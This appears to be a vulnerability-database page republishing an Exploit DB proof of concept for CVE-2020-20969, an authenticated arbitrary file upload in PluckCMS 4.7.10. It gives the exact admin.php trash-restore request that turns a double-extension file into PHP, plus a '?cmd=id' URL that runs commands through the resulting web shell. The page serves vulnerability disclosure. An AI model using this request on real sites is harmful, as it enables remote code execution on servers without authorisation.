📄 PluckCMS 4.7.10 Arbitrary File Upload

🗓️ 03 Dec 2025 00:00:00Reported by CodeSecLabType

packetstorm🔗 packetstorm.news👁 125 Views

PluckCMS 4.7.10 allows unrestricted file upload via trash restoration with a valid session.

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2020-20969	4 Dec 202521:02	–	circl
CNNVD	PluckCMS 代码问题漏洞	20 Jun 202300:00	–	cnnvd
CNVD	PluckCMS Arbitrary File Upload Vulnerability	28 Jun 202300:00	–	cnvd
CVE	CVE-2020-20969	20 Jun 202300:00	–	cve
Cvelist	CVE-2020-20969	20 Jun 202300:00	–	cvelist
Exploit DB	PluckCMS 4.7.10 - Unrestricted File Upload	3 Dec 202500:00	–	exploitdb
EUVD	EUVD-2020-13748	7 Oct 202500:30	–	euvd
NVD	CVE-2020-20969	20 Jun 202315:15	–	nvd
OSV	CVE-2020-20969	20 Jun 202315:15	–	osv
Packet Storm	📄 PluckCMS 4.7.10 Shell Upload	16 Feb 202600:00	–	packetstorm

# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/pluck-cms/pluck/
    # Software Link: https://github.com/pluck-cms/pluck/
    # Version: 4.7.10 
    # Tested on: Windows
    # CVE : CVE-2020-20969
    
    
    Proof Of Concept
    GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
    Host: pluck
    Cookie: PHPSESSID=[valid_session_id]
    
    **Access Method:**  
    http://pluck/files/exploit_copy.php?cmd=id
    
    **Additional Conditions:**  
    1. Valid session cookie required (authenticated attack)
    2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
    3. Server must not filter double extensions during file upload/trash operations
    
    
    Steps to Reproduce
    Log in as an admin user.
    Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
    The file will be restored and can be accessed through the url.

03 Dec 2025 00:00Current

7.3High risk

Vulners AI Score7.3

CVSS 3.17.2

EPSS0.01596

SSVC